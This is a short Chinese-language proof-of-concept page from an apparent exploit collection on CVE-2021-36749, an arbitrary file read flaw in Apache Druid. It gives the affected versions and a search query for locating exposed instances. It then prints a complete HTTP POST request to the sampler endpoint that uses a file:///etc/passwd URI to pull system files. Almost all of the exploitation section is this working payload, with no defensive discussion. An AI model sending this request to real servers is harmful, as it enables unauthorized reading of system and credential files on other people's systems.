POC/wpoc/Apache/ApacheDruid/ApaceDruid存在任意文件读取漏洞(CVE-2021-36749).md

# Apace Druid存在任意文件读取漏洞(CVE-2021-36749)

# 一、漏洞简介
<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Apace Druid存在任意文件读取漏洞</font>

# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
+ Apache Druid < 0.20.1

# 三、资产测绘
```java
title="Apache Druid"
```

![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/zvg_dvGP6RhRXWMv/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-937404.png)

# 四、漏洞复现
```java
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 
Content-Length: 478
Content-Type: application/json;charset=UTF-8

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
```

![1718117802135-f92f986f-5890-432f-a686-de5f7ae3729e.png](./img/zvg_dvGP6RhRXWMv/1718117802135-f92f986f-5890-432f-a686-de5f7ae3729e-877497.png)



> 更新: 2024-06-17 09:22:47  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb0owzvtgrgfqdii>